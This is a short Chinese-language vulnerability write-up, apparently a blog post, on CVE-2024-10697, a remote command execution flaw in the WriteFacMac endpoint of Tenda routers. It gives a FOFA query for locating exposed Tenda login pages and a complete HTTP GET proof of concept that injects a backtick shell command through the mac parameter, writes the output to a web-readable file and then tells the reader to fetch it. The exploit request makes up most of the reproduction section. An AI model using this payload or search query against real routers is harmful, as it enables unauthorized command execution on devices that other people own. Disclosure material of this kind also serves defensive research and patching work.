tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697)

一、漏洞简介

tenda路由器WriteFacMac存在远程命令执行漏洞

二、漏洞影响

css 复制代码
tenda路由器

三、网络测绘:

css 复制代码
fofa:
title="Tenda | LOGIN"

四、复现过程

POC 1

http 复制代码
GET /goform/WriteFacMac?mac=`ls%20%3E/webroot/1.txt` HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0

访问

url/1.txt

相关推荐
CHICX12299 小时前
2.MySQL 手工注入:从原理到 sqli-labs 实战
web安全·网络安全
Xudde.9 小时前
班级作业笔记报告0x10
笔记·学习·安全·web安全·php
m0_738120729 小时前
渗透基础知识ctfshow——Web应用安全与防护(第一章)
服务器·前端·javascript·安全·web安全·网络安全
hwscom11 小时前
Chamilo存在命令注入漏洞(CNVD-2026-14971、CVE-2025-50196)
web安全·chamilo
赵侃侃爱分享12 小时前
AI怎么定义网络安全
人工智能·安全·web安全
上海云盾-小余13 小时前
服务器被入侵后如何快速止损?从排查到加固的应急处置全流程
网络·网络协议·tcp/ip·安全·web安全
FreeBuf_14 小时前
14000余台F5 BIG-IP暴露,高危RCE漏洞正遭活跃利用
tcp/ip·安全·web安全
Xudde.14 小时前
班级作业笔记报告0x08
笔记·学习·安全·web安全
Xudde.17 小时前
班级作业笔记报告0x09
笔记·学习·安全·web安全·php
CHICX122917 小时前
3.SQL 注入之高权限注入(上):从权限原理到跨库攻击,吃透 root 权限注入的危害与防御
web安全·网络安全